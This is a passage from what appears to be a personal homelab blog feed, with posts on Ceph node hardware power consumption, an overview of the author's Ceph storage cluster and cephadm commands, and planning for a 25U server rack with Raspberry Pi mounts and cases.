for the sake of having high availability. I&rsquo;ve currently already got one
<a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a> serving as a Ceph node
with a single HDD and SSD. I like it, as it&rsquo;s pretty light on power consumption
with the very efficient <a href="https://www.intel.de/content/www/de/de/products/sku/212328/intel-celeron-processor-n5105-4m-cache-up-to-2-90-ghz/specifications.html">Intel Celeron N5105</a> at 10W TDP.
And I had already decided to get two more of those, to replace my current x86
main machine serving two Ceph VMs with one HDD and one SSD each, behind a 1Gbps
NIC.</p>
<p>On <a href="https://www.cpubenchmark.net/compare/4412vs3133/Intel-Celeron-N5105-vs-AMD-A10-9700E">CPUbenchmark.net</a>,
the H3&rsquo;s CPU is 25% faster and has a 25W lower TDP. It&rsquo;s also 6 years newer than
the AMD CPU. Also, the A10 uses the rather sad Excavator architecture.</p>
<p>For some measurements, I connected the machine to a smart power plug and booted
it off a USB stick. The results were pretty sobering.</p>
<ul>
<li>The A10-9700E eats 25W at idle, sitting at the command prompt of an Arch install
USB stick</li>
<li>When fully loaded with <code>stress --cpu 4</code>, it goes up to 50W</li>
</ul>
<p>On the bright side: The low profile <a href="https://noctua.at/en/nh-l9a-am4">Noctua NH-L9a-AM4</a>
can easily cool the A10 at about 45 degrees C even with <code>stress --cpu 4</code>.</p>
<p>My only H3 is currently deployed as a Ceph node, so I can&rsquo;t easily plug it into
a separate power plug and measure it. But considering that it&rsquo;s six years younger
and an embedded class CPU, I expect it to come pretty close to the 10W TDP. The
Odroid website claims about 1W - 9W idle and up to 18W under load. Which is
still way lower than the 25W at which the A10 idled.</p>
<p>In addition, I would need a new PSU for the A10, as the current one just doesn&rsquo;t
sound very good anymore. It was cheap to begin with, and then ran non-stop for
about three years.</p>
<p>But there are advantages to reusing the A10 and only buying one additional H3.
First, it would save me about 100 bucks, when taking the new PSU for the A10
into account.
Second, it has a proper PSU, with a lot of SATA power cables. And the Mainboard
has four SATA ports, and multiple PCIe Gen3 ports for more SATA cards. The RAM
can also be changed out, and it supports up to 64GB. So in theory, I would be
able to connect a lot of disks to this thing. A lot more than the two that
can be connected to the H3 before you have to go SATA port multiplier. And then
there would still be the problem of powering more than two SATA disks, as the
H3 only has two power connections and is itself supplied by a power brick, not
a proper PSU.</p>
<p>Finally, there&rsquo;s the environmental aspect. Instead of buying a new thing, almost
none of which is upgradeable at all, I could reuse old hardware that would go
into a landfill (well, some electronics recycling more likely) otherwise.</p>
<p>I must admit that, due to the power consumption of the A10, I&rsquo;m still undecided.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Current Homelab - Ceph Storage</title>
      <link>https://blog.mei-home.net/posts/homelab-2022/storage/</link>
      <pubDate>Thu, 16 Feb 2023 23:20:50 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-2022/storage/</guid>
      <description>How I store data in my Homelab with Ceph</description>
      <content:encoded><![CDATA[<p>This is the next post in the <a href="https://blog.mei-home.net/tags/homelab-current/">Current Homelab series</a>,
where I give an overview of what my lab is currently looking like.
This time, I will be talking about my storage layer, which is mostly made up of
<a href="https://ceph.io">Ceph</a>.</p>
<p>I chose Ceph around spring 2021, when I decided to go from a baremetal+docker-compose
setup to a VM based setup with LXD. At the time, my main storage consisted of
a pair of WD Red 4TB disks for my main storage requirements, and a 60GB crucial
SATA SSD for my server&rsquo;s root FS. While going through the <a href="https://linuxcontainers.org/lxd/introduction/">LXD</a>
docs, I saw that it supported something called &ldquo;Ceph RBD&rdquo; for its VM volumes.</p>
<p>After some research into Ceph, I was hooked. The main driver for me: It provides
all current types of storage from a single pool of disks, and it had good
permission management on top. I could take storage from the same disk for RBDs,
Ceph&rsquo;s block device provider, for my VM root disks. CephFS, again using the
same storage pool, would provide me with a good POSIX compatible file system
capable of being used at the same time between multiple hosts.
And finally, the RadosGW would provide me with an S3 API for those of my services
which were able to use it.</p>
<p>In addition, I had already decided to migrate my system to Nomad. Nomad supports
the CSI spec (way better now than it did back then) and I wanted to use that
for my container&rsquo;s data volumes.</p>
<p>Plus, it was complicated (or rather, it looked complicated to me then &#x1f609;).
So of course I had to set it up in my homelab. &#x1f605;</p>
<h1 id="what-exactly-is-ceph">What exactly is Ceph?</h1>
<p>To go with Ceph&rsquo;s own words:</p>
<blockquote>
<p>Ceph is an open-source, distributed storage system.</p></blockquote>
<p>Right now, I believe its main developer is Red Hat, where it is packaged as
&ldquo;Red Hat Enterprise Storage&rdquo;. But it also has a lot of other contributors. The
virtualization OS <a href="https://pve.proxmox.com/wiki/Deploy_Hyper-Converged_Ceph_Cluster">Proxmox</a>
for example uses Ceph as one of their storage layers.</p>
<p>One word of caution: Don&rsquo;t use it on Arch. In Arch typical fashion, you might
start using it, and then it gets incredibly outdated in their packages, and then
it&rsquo;s gone. Remember: There&rsquo;s a reason lots of people love to use it as their OS
of choice - and nearly nobody actually uses it for anything productive.</p>
<p>So what is Ceph? At the core, it is a set of Daemons (these days deployed in
Docker containers) running on a set of hosts.</p>
<p>There are three types of important daemons in every cluster:</p>
<ul>
<li>Ceph MON daemons: They are the &ldquo;brain&rdquo; of the operation, coordinating the
cluster. We can liken it to a &ldquo;control plane&rdquo;.</li>
<li>Ceph MGR daemons: These daemons &ldquo;manage&rdquo; the cluster deployment. They provide
a very nice dashboard+web interface and control the orchestrator</li>
<li>Ceph OSD daemons: These are the actual storage services. Normally, there is
one daemon per disk in the cluster</li>
</ul>
<p>A good overview of Ceph&rsquo;s architecture can be found <a href="https://docs.ceph.com/en/quincy/architecture/">here</a>.</p>
<p>In principle, it works something like this: Every piece of data which is written
to the cluster - whether it&rsquo;s coming in via an RBD, CephFS or S3, is written to
a RADOS (Reliable, Autonomous, Distributed Object Store) object. These objects,
in turn, are written to placement groups, which in turn are written to OSDs.</p>
<p>The MON daemons are the first piece of a Ceph cluster contacted by any client.
They contain what&rsquo;s called the &ldquo;cluster map&rdquo; - information on what the cluster
is currently looking like. They also forward info about other daemon&rsquo;s IPs and
ports, so that clients only need the IPs of the MON daemons.</p>
<p>But that&rsquo;s where the job of the MON daemons (relating to clients) ends. MON
daemons do not play any part at all in the actual data transfer. For that, the
client directly contacts one of the OSDs which holds the required piece of data.
This is Ceph&rsquo;s main scalability mechanism - instead of going through a central
daemon, clients contact the storage daemons directly. This avoids both, a perf
bottleneck and a single point of failure. That&rsquo;s why MONs hand the cluster map
to clients. With those maps, the clients can compute which OSD a specific piece
of data is located on. The algorithm used to compute data placement - both, in OSD
daemons when writing a new piece of data, and in clients when looking for a piece
of data - is called &ldquo;CRUSH&rdquo;, the &ldquo;Controllable, Scalable, Decentralized placement
of replicated data&rdquo;.</p>
<p>In addition to these basic daemons, Ceph also supports some additional daemons
for specific tasks. I will go into detail later, but for completeness&rsquo; sake:</p>
<ul>
<li>Rados Gateway daemons provide an S3 (and Swift) compatible API</li>
<li>MDS daemons are needed for CephFS to work (they store/handle file metadata and locking)</li>
<li>NFS: Ceph provides the ability to export Ceph storage as NFS via <a href="https://github.com/nfs-ganesha/nfs-ganesha">NFS Ganesha</a></li>
<li>If you don&rsquo;t have any monitoring yet, Ceph can deploy Prometheus/Grafana in
the cluster</li>
</ul>
<h2 id="data-organization">Data organization</h2>
<p>As mentioned above, all data in a Ceph cluster is owned by an &ldquo;OSD&rdquo; daemon - an
&ldquo;Object Storage Device&rdquo; daemon. These daemons normally own an entire disk,
controlled via LVM2. If necessary, you can also only assign a LVM partition
to the daemon. But for performance reasons, it is preferred to assign an entire
disk to the OSD.</p>
<p>An OSD daemon normally requires storage for multiple pieces of data. The first
one is the actual data to be stored. But the daemon also makes use of a WAL
and a DB for indexing the data.
All three of these datasets can be stored on the same disk - this is the
default, and also what I&rsquo;m doing to make the most out of my available storage.
But you can also go for a different approach, for example with the WAL on another
device entirely. Especially for HDDs, this will improve performance considerably.
With both the WAL and the data itself on the same HDD, the max write speed you
will reach is around 60 MByte/s. Because the OSD needs to write both, the WAL
and the actual data to the same disk. When the WAL is stored on another device,
you will get your full write speed. I will go into a bit more detail on why I
decided against that later.</p>
<p>After a new OSD has been created, the CRUSH algorithm comes into play. Each
OSD can be assigned a class - by default, these are just the disk types, SSD or
HDD. These can be used in <em>CRUSH rules</em>. CRUSH rules in turn describe how
the data is stored in the cluster. In my case, I didn&rsquo;t do too much fancy
configuration here. I only have two different rules. One for HDDs, one for SSDs.
The major decision for CRUSH rules is whether you would like to use erasure coding
or simple replication. I decided for simple replication, which makes sure
that each piece of data is written to multiple OSDs, and with that multiple
disks. In my setup, the replication factor is two - which is similar to RAID1.
Every piece of data is written to the cluster twice. Quite frankly, the reason
I went with replication was that I at least could understand the approach and
the failure modes. &#x1f609;</p>
<p>The next step is creating different &ldquo;Pools&rdquo;. These are storage abstractions
mostly useful for access control. I&rsquo;ve got two base pools, <code>homenet-base-fast</code>
containing only SSDs and <code>homenet-base-bulk</code>, containing only HDDs. Then
I&rsquo;m using several additional pools for separation of concerns, e.g. one SSD
only pool for VM&rsquo;s root volumes. The main effect this has is that I can do
better access control on the pool level than when just putting everything into
the same pool.</p>
<p>Once you&rsquo;ve setup pools, you can use them for anything - S3, block devices and
CephFS, at the same time.</p>
<p>For example, when <a href="https://docs.ceph.com/en/latest/rbd/rados-rbd-cmds/#creating-a-block-device-image">creating an RBD volume</a> you provide the image name, but also the pool name where the image
should be created.</p>
<h2 id="cephadm-the-orchestrator">Cephadm: The Orchestrator</h2>
<p>Now onto how a Ceph cluster is actually set up. In the past, this was done via
direct baremetal installs with Ansible. But since a couple of releases ago,
all deployment related actions are done with a tool called <em>cephadm</em> by default.
This is a reasonably simple script which can deploy and manage Docker containers
and their accompanying Systemd units.</p>
<p>A host to be used with Ceph only needs a couple of things installed:</p>
<ul>
<li>Docker or Podman</li>
<li>systemd</li>
<li>An NTP client</li>
<li>cephadm (can just be downloaded with e.g. <code>wget</code> as it is only a script)</li>
</ul>
<p>And that&rsquo;s it. Then a simple <code>ceph orch host add HOSTNAME IP</code> will initialize it
and make it known to the cluster orchestrator. Then daemons can be deployed with
<code>ceph orch apply...</code>.</p>
<p>For example, if you&rsquo;ve got a running cluster, and you&rsquo;re adding the new host
<code>freshdisk</code> with an unused SSD at <code>/dev/sdb</code>, the following commands will add
that unused disk to your cluster&rsquo;s capacity:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch host add freshdisk 10.0.0.42
</span></span><span style="display:flex;"><span>ceph orch daemon add osd <span style="color:#e6db74">&#34;freshdisk:/dev/sdb&#34;</span>
</span></span></code></pre></div><p>And that&rsquo;s it already. Isn&rsquo;t that beautiful? &#x1f604;</p>
<p>The orchestrator can also be used for other things, like looking at the
current status of all the cluster daemons:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch ps
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NAME                              HOST    PORTS        STATUS         REFRESHED  AGE  MEM USE  MEM LIM  VERSION  IMAGE ID      CONTAINER ID  
</span></span><span style="display:flex;"><span>mds.homenet-fs.geb.jsczvb         geb                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M     174M        -  16.2.10  894500bd46d8  5f24c8b16ff2  
</span></span><span style="display:flex;"><span>mds.homenet-fs.neper.hsozsd       neper                running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   7d    25.4M        -  16.2.10  894500bd46d8  481d92500a33  
</span></span><span style="display:flex;"><span>mgr.neper.rudmha                  neper   *:8443,9283  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   7d     426M        -  16.2.10  894500bd46d8  e5b454d491da  
</span></span><span style="display:flex;"><span>mgr.nut.xkdana                    nut     *:8443,9283  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago   6d     587M        -  16.2.10  894500bd46d8  7b0312baae1e  
</span></span><span style="display:flex;"><span>mon.baal                          baal                 running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago   8d     934M    2048M  16.2.10  37f942a69a5c  0cb251b98f47  
</span></span><span style="display:flex;"><span>mon.beset                         beset                running <span style="color:#f92672">(</span>21h<span style="color:#f92672">)</span>     5m ago   8d     938M    2048M  16.2.10  37f942a69a5c  fbea8a9de708  
</span></span><span style="display:flex;"><span>mon.buchis                        buchis               running <span style="color:#f92672">(</span>21h<span style="color:#f92672">)</span>     5m ago   8d     935M    2048M  16.2.10  37f942a69a5c  ae0268da0793  
</span></span><span style="display:flex;"><span>nfs.hn-nfs.0.2.neper.bxpxxu       neper   *:2049       running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago  15h    73.0M        -  3.5      894500bd46d8  202f56311c86  
</span></span><span style="display:flex;"><span>osd.0                             nut                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    2457M    4096M  16.2.10  894500bd46d8  d5007c723c51  
</span></span><span style="display:flex;"><span>osd.1                             geb                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    2698M    4096M  16.2.10  894500bd46d8  d72e54c8258f  
</span></span><span style="display:flex;"><span>osd.2                             nut                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    4790M    4096M  16.2.10  894500bd46d8  424b6acd8c98  
</span></span><span style="display:flex;"><span>osd.3                             geb                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    5099M    4096M  16.2.10  894500bd46d8  09c3451810fd  
</span></span><span style="display:flex;"><span>osd.4                             neper                running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   9d    3922M    4096M  16.2.10  894500bd46d8  2f73877ca52e  
</span></span><span style="display:flex;"><span>osd.5                             neper                running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   9d    5682M    4096M  16.2.10  894500bd46d8  2708af5a1fab  
</span></span><span style="display:flex;"><span>rgw.homenet.homenet.geb.qkcblq    geb     *:80         running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  16M     229M        -  16.2.10  894500bd46d8  3686fe149ac6  
</span></span><span style="display:flex;"><span>rgw.homenet.homenet.neper.amnqro  neper   *:80         running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   7d     209M        -  16.2.10  894500bd46d8  b33b760f9082  
</span></span></code></pre></div><p>You can also stop entire services, e.g. <code>ceph orch stop rgw.homenet.homenet</code> will
stop all of my RGWs. Another example is the version upgrade. The orchestrator
will, one after another, stop the daemons, update the Docker image and restart
the daemon. It makes sure to never update more than one daemon from any specific
service to make sure the entire cluster stays up.</p>
<h1 id="the-web-ui">The Web UI</h1>
<p>In addition to the command line interface, Ceph also provides a comprehensive
Web UI. It allows executing almost all actions you might want to use, if you
don&rsquo;t like CLIs.</p>
<figure>
    <img loading="lazy" src="../ceph_dashboard.png"
         alt="A screenshot of the Ceph Web UI. On the left it shows a menu with entries like &#39;cluster&#39; and &#39;File Systems&#39;. In the main part, there are a number of graphs. The top part shows the cluster status, with a general health status, the number of hosts, the numbers of different Ceph daemons like MONs or OSDs. In the middle is some general cluster capacity data. It shows a total capacity of 13 TB with 4 TB used. The next graph shows 1.1 million objects, the status of the 497 placement groups and the number of pools, 15. Next come performance graphs. Client Read/Write shows 30 IOPS, 3 reads and 27 writes. Furthermore, the throughput is shown, 18.5 KiB/s read and 341,1 KiB/s write. Finally, both the scrubbing and recovery throughput graphs are idle."/> 
</figure>

<h1 id="ceph-in-the-homelab">Ceph in the Homelab</h1>
<p>So why would you run Ceph in the Homelab? I&rsquo;m afraid I can&rsquo;t provide a comparison
to ZFS, which is the other main Homelab storage solution, as I never used it.</p>
<p>But here are a couple of points for and against Ceph at home. First, it&rsquo;s all
commodity - you don&rsquo;t need any special HW. You can also mix and match. Have an
old 500 GB HDD laying around that&rsquo;s still good? No problem throw it into your
cluster together with 1 TB, 6TB, 4 TB etc disks. Ceph simply doesn&rsquo;t care.
To a certain extend, at least. If you&rsquo;ve got a replication factor of two, and
you combine one 6TB disk with one 500 GB disk - you will have a bad time, of course.
But if you have two 1TB disks and add a third 60GB disk - you will still benefit
from (a bit) more space.</p>
<p>Easier expansion is another plus. You don&rsquo;t necessarily have to find another
space for your new HDD in your current server - you can just add a new server.</p>
<p>Then there&rsquo;s the fact of having the ability to get all three types of storage
from exactly the same disk. No thinking about where to put the datadir for
MinIO anymore, or resizing disks to fit another VM root disk into your LVM pool.</p>
<p>So why wouldn&rsquo;t you use Ceph? First of all, I would advise against running it
on only a single node. Its standard upgrade mechanism depends on the fact that
you&rsquo;ve got multiple MGR daemons on different hosts. It does work - I did it
for a time, but it&rsquo;s not too much fun. When you take down that single machine,
your entire storage is gone.</p>
<p>You should also consider what I/O you&rsquo;re expecting. Ceph is completely network
based. Not only do the clients need to contact the OSDs for a write operation,
but the OSDs also need to contact other OSDs for replication. I&rsquo;ve got a 1 Gbps
network in my lab at the moment. That means I can at most transfer about
125 MByte/s. That&rsquo;s just a single commodity HDD worth of transfer. And it is
far below what current SATA SSDs, let alone NVMe SSDs, can do. That&rsquo;s also the
reason I never bothered with NVMe disks in my Ceph cluster. But quite honestly:
I don&rsquo;t really see this as any sort of problem in my cluster. The average
throughput is below 1 MByte/s.</p>
<p>One more point is the RAM consumption. Every OSD consumes at least 4GB of memory
by default. That means for each disk in your Ceph cluster, you need 4GB of RAM. This
becomes problematic when trying to run a Ceph cluster on e.g. Raspberry Pis.</p>
<p>Finally, one big downside I see with Ceph&rsquo;s &ldquo;cluster of commodity HW&rdquo; approach,
specifically in the Homelab: Physical space. I&rsquo;m living in a nice apartment,
but I don&rsquo;t have a separate space for my servers. So with too many physical
machines, the space gets really cluttered. You have to be able to place those
Ceph nodes somewhere. I don&rsquo;t mind too much, but especially if you&rsquo;re not living
alone, you might have some restrictions on how many machines you can strew all
over the place. &#x1f609;</p>
<h1 id="my-ceph-setup">My Ceph setup</h1>
<p>Before I give a short description of my setup, let me emphasize one thing: It
changed a lot, in the beginning! And it was always the same cluster, with the
same data. Ceph handled all of those migrations without a single hiccup.</p>
<p>My Ceph journey looked like this:</p>
<ol>
<li>Initial setup baremetal on my x86 server with 2x HDDs
The OS here was Arch (Do not recommend!). Moved away from this deployment
because I wanted to use the storage for services which were autostarted at
boot, and this produced timing problems.</li>
<li>A single LXD VM. Here, I slowly migrated the Daemons one by one from the
baremetal host to the VM. Sure, I paid a hefty price because all of the data
had to be copied to the &ldquo;new&rdquo; disk in the VM - but it worked flawlessly. Here
I also added 2x SSDs for faster storage</li>
<li>Multiple LXD VMs. This was mostly to be able to comfortably run multiple
instances of e.g. MON and MGR daemons.</li>
<li>Addition of one more HDD and SSD connected to a Raspberry Pi CM4 with a very
very jank <em>Raspberry Pi IO Board PCIe x1 slot</em> -&gt; <em>PCIe to SATA card</em> setup.
I ran this as a testing ground for about a year, and it was very stable. But
due to the 8GB RAM ceiling on the Pi, I wasn&rsquo;t able to provide the full 4GB
to both OSDs. That&rsquo;s why I finally canned the plan of using Pis as my storage
daemons.</li>
<li>Switching the disks from the Pi to an Odroid H3. More juice, and more important,
more RAM</li>
</ol>
<p>Through all of this, I destroyed and recreated daemons quite often. In the most
recent migration, from the Pi to the Hardkernel, I was able to capture a lot
of metrics:</p>
<ul>
<li>The limiting factor for the migration was not CPU or even storage speed,
but network speed. With the 1 Gbps I have, I was barely able to saturate a
single HDD. But Ceph was perfectly able to use every last bit of those 1 Gbps.</li>
<li>You do not get your HDDs full write speed - instead you get around half, as
you need to write both, the WAL and the actual data.</li>
<li>During the whole time, the Pi&rsquo;s CPU was not fully loaded</li>
</ul>
<p>When it comes to Linux distributions, I would like to argue against Arch. Ceph
just isn&rsquo;t in there anymore. But I&rsquo;ve had good experience with both Debian and
Ubuntu, there are packages available for both.</p>
<p>Taking the points above, my next upgrade for general Homelab perf improvements
might be 2.5 Gbps Ethernet. Even though at this point I might just want to go
10 Gbps, at least between my Ceph nodes.</p>
<p>My next change for the storage area is going to be disabling my last two Ceph VMs,
and migrating them to Hardkernel H3 as well. I&rsquo;m constantly frustrated in my search
for good Ceph node HW. On the one hand, I don&rsquo;t actually need much CPU. I&rsquo;m pretty
sure the Pi did pretty well where compute was concerned. But I do need lots of RAM.
And lots of SATA connectors. But I would also like to have low power consumption.
Sadly, the low power retail CPU space is pretty bare, at least right now. Even
the low power CPUs with 35W TDP are too much. But anything smaller gets into
bespoke machines with soldiered CPU and RAM in bespoke form factors and enclosures.
With a single SATA port, if you are that lucky. And for some reason the ITX board
space is just weird and expensive.</p>
<p>So for now, the Odroid H3 will serve me well, but I would have wished that I
could decide on a proper board+CPU.</p>
<p>So what&rsquo;s your opinion on Homelab storage? I would especially love to read a
similar article like this one here, but about ZFS, as I have zero experience
with it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Racking the Homelab: Planning</title>
      <link>https://blog.mei-home.net/posts/rack-plan/</link>
      <pubDate>Mon, 13 Feb 2023 00:28:41 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/rack-plan/</guid>
      <description>I&amp;#39;m running out of space. So I decided to buy a 25U server rack.</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve finally made my decision and bought a server rack. The main reason is this:</p>
<figure>
    <img loading="lazy" src="homelab-corner.jpg"
         alt="A picture of three computer cases, two of them stacked atop one another. To the right of them is another large big tower computer case. And to the right of it is part of a desk. To the left of the two stacked cases is a shelf. There are several SBCs and a network switch in it. On the ground between the stacked cases is a 12x power plug tower. Almost all outlets are used. Around all of it is a veritable jungle of cables."/> 
</figure>

<p>Those two large cases in the middle house my two Turing Pi 2 boards with four
Raspberry Pi CM4s each. I&rsquo;ve written about them <a href="https://blog.mei-home.net/posts/turing-pi-2/">here</a>.
The rightmost big tower case houses my &ldquo;old&rdquo; x86 server,
which I&rsquo;m retiring soon. The elongated black case with the fan grill in the front
on the shelf is an <a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a>,
serving as a Ceph storage cluster node. The other two nodes I&rsquo;ve currently got
are running in VMs on the x86 server. I would like to move those onto another
pair of H3s.</p>
<p>While a secondary goal for doing so is to reduce power consumption of the lab a
bit, the main reason is that I&rsquo;d like to spread out the Homelab a bit, so
that I can take down a single machine whenever I like, without having to take
down the entire Nomad cluster, all jobs running on it, and the storage cluster,
and all of the CM4s, because they all netboot off of the Ceph cluster.</p>
<p>That&rsquo;s my current main Homelab goal: Getting so far that I can take down any
machine without disturbing the rest. One of the main drivers is that I&rsquo;m now
running externally visible services used by others out of it. And I really don&rsquo;t
want to deprive my Mastodon followers of my most intelligent and/or funny musings
any longer than I have to during maintenance windows. &#x1f609;</p>
<p>But, you might say: This H3 case doesn&rsquo;t look too big! You could easily fit
two more into that Homelab corner of yours! And you&rsquo;re right. I could.</p>
<p>But while the H3 case is generally okay, it has one large flaw: Noise.
Here&rsquo;s a picture from back when I assembled it:</p>
<figure>
    <img loading="lazy" src="h3-case.jpg"
         alt="A picture of a half assembled case. The side panels are screwed directly into a HDD sitting in the middle and holding the case together."/> 
</figure>

<p>The HDD is the central, load-bearing element of the entire H3 case. This means
that there is very little vibration isolation. In short, I can hear the disk very
clearly in normal working conditions. And not just during disk access, but also
just the sound from the rotating platters. It&rsquo;s way too loud for my taste.
So just putting the other two H3 I intend to buy into the same case, as well as
keeping the current H3 in that case, are not viable plans for the future.</p>
<p>But, as can be seen on the first picture, if I add any more standard PC cases,
my Homelab corner will be pretty cluttered. So I finally decided to bite the
bullet and go full rack mounting for my Homelab.</p>
<h1 id="the-rack-it-costs-how-much">The rack: It costs how much?!</h1>
<p>At first, I wanted to buy a 15U rack at most. I just needed to put a couple of
systems in there, right? But then I realized that I also want to put my other
freestanding systems (two small NUC class machines) in there. And the switch
should also have its space.</p>
<p>So I would need to find the space for the following machines in the rack:</p>
<ul>
<li>5 Raspberry Pi 4 boards</li>
<li>One UDOO x86 II</li>
<li>One pretty small NUC style machine serving as my Command and Control machine</li>
<li>Two ITX Turing Pi 2 boards</li>
<li>Three Odroid H3 boards with enough space for some HDDs and SSDs</li>
<li>One 16 port switch</li>
</ul>
<p>That&rsquo;s what I want to put into the rack. I might also put my networking gear,
consisting of another 8 port switch, a WiFi router, my firewall appliance
and my VDSL modem in there, but I haven&rsquo;t really decided about that yet.</p>
<p>So even if I went with 2U for everything, I would end up with 6U for the H3,
another 4U for the Turing Pi 2, 2U for the Pis and at least another 4U for
the switch and the NUCs, for a total of 16U. Just to be on the safe side, I
decided to go with a 25U rack.</p>
<p>And just looking at the prices for racks made me swallow pretty hard. I finally
ended up with the <a href="https://www.startech.com/en-us/server-management/4postrack25u">StarTech 25U 4-poster rack</a>.
That one costs around 315,- € in Germany. Comes with a small set of cage nuts
and coasters, which I like.</p>
<p>It also has adjustable depth. I will most likely make it 60cm deep, which fits
comfortably into my Homelab corner without sticking out beyond the depth of
my desk. That will also be plenty for the cases I chose.</p>
<h1 id="rack-plan">Rack plan</h1>
<p>The plan for putting in the different machines looks something like this:</p>
<figure>
    <img loading="lazy" src="rack_diagram.png"
         alt="A rectangular diagram showing the assignments of the rack slots. At the bottom are three rectangles on top of each other, all labeled H3. On top of that is another rectangle marked Turing Pi 2. On top of that is another, slightly smaller rectangle marked 2U shelve/switch. Atop of that is another rectangle marked Turing Pi 2. Then comes some free space, with another rectangle marked 2U Raspberry Pi mount and one last rectangle marked 1U shelve at the very top."/> 
</figure>

<p>As the rack I chose is open at the top, I only put a 1U shelve there to put the
Udoo and the NUC there. Depending on how much space I&rsquo;ve left there, I will also
put my other networking gear onto that top shelve. I put my Ceph nodes at the bottom, as they
will be getting all the HDDs and consequently will end up being the heaviest
part. The networking switch for the racked gear will be sitting in the middle.
If I put all the other networking gear there as well, I might also put the
8 port switch on that shelve, on the backside.</p>
<p>I&rsquo;ve also ordered two rack mountable power strips, which I will mount somewhere
on the rack&rsquo;s backside.</p>
<h1 id="the-pis">The Pis</h1>
<p>A colleague at work introduced me to <a href="https://shop.racknex.com/">Racknex</a>, an
Austrian company. He send me the link after I told him how many deployed Pis
I now have, noting that I might want to buy something from them. He put a laughing
emoji after that. Joke&rsquo;s on him, the package arrived yesterday. &#x1f60f;</p>
<p>Racknex seems to be one of those wonderfully weird small companies which have
found a delightfully weird niche and become highly comfortable in it. Their niche
seems to be making rack mounts for just about everything. One amusing example is
<a href="https://shop.racknex.com/fritzbox-7590-rackmount-kit-19-inch/">a mount for different AVM FritzBox models</a>.</p>
<p>I&rsquo;ve bought their <a href="https://shop.racknex.com/19-inch-raspberry-pi-rackmount-kit-um-sbc-207/">12 Raspberry Pi 2U mount</a>. It is a pretty versatile mount, as you can&rsquo;t just mount Raspberry Pis in
the twelve slots, but also face plates for keystone modules. I have only bought
six Pi mounts. The other six slots will remain open, as I need to use the opening
for the USB cables to attach the SSDs to the Pis. They are also selling USB
keystone modules, which would have given the entire thing a cleaner look, but here
I made the one sensible decision in this entire endeavor and decided that just
having the USB cables go in is enough. &#x1f605;</p>
<p>In the back of the mount, there are also a couple of mounting holes for SSDs I
will be using.</p>
<p>My big worry with this mount is cooling for the Pis. Initially I thought: Okay,
you&rsquo;re just going to buy a couple of Noctua 60mm fans. Those are hopefully going
to be quiet enough. Then I realized: I will somehow have to power them. And the
Pi does not have any PWM capability. I could connect the fans to the 5V pin of
the Pi&rsquo;s GPIO header - but then they would go at full blast all the time. Not
ideal with 60mm fans. In the end, I decided to forget active cooling for now.
The Pis have pretty beefy heatsinks on them which are working fine right now.
Hopefully they won&rsquo;t get that much hotter in the closer confines of the rack.</p>
<p>I&rsquo;m very happy with this mount. It looks like a great option for dense mounting
of many Pis. A bit pricey, at 233,- €, but oh well.</p>
<h1 id="the-h3-and-turing-pi-cases">The H3 and Turing Pi cases</h1>
<p>The cases for the H3 and the Turing Pis were a completely different matter and
it took me quite a while to find something I liked. Initially, the plan was to
go with a 2U case. I was a little bit worried about the fans, but I found one
which allowed 80mm and figured that using some good Noctuas will hopefully be
quiet enough.
The rack will be sitting next to my desk, in my living room. So quiet is rather
important.</p>
<p>I had almost finished setting up the order when I returned to something which
bothered me about the 2U case I had chosen. It mentioned that it was compatible
with a standard ATX power supply with an 80mm fan. I finally went to the product
page of the power supplies I&rsquo;m already using and checked. They claimed a 120mm
fan. That was the moment I realized that my assumption that they meant an 80mm
top fan must have been wrong. Because ATX power supplies have standard dimensions.
And if 80mm was for the top fan, how would my PSU be able to fit the ATX
dimension and have a 120mm fan while the case allowed to fit an ATX PSU - but
only one with 80mm fans?</p>
<p>It turns out that the 80mm fan was for a front to back alignment, not a top to bottom
one, like I&rsquo;m used to seeing on PC power supplies.
So technically, my standard PC power supply would have fit perfectly fine in a
2U case - but its fan would have been mashed up against the top of the case
and chocked there.</p>
<p>After some thinking I decided that going with a 3U case was the best choice now.
It would allow for fitting a standard PC power supply without issue, and it
would also allow for 120mm case fans. I addition, if I ever decide to switch to
more standard components, I would have space for a decent CPU cooler.</p>
<p>I decided on <a href="https://www.inter-tech.de/produktdetails-18/3U-30255.html">this case</a>.
That should give me plenty of space for future expansion, and it allows for up
to three 120mm fans. I will be replacing the buildin ones with a couple of
Noctua 120mm fans.</p>
<h2 id="turing-pi-2-fan-control">Turing Pi 2 fan control</h2>
<p>One last problem which remained to be solved: How to control the cooling fans
in the Turing Pi 2 cases? Those boards don&rsquo;t have case fan headers. After some
searching, I finally decided to go with <a href="https://noctua.at/en/products/accessories/na-fc1">Noctuas fan controller</a>. It allows me to control PWM fans with a manual dial.</p>
<h1 id="decorations">Decorations</h1>
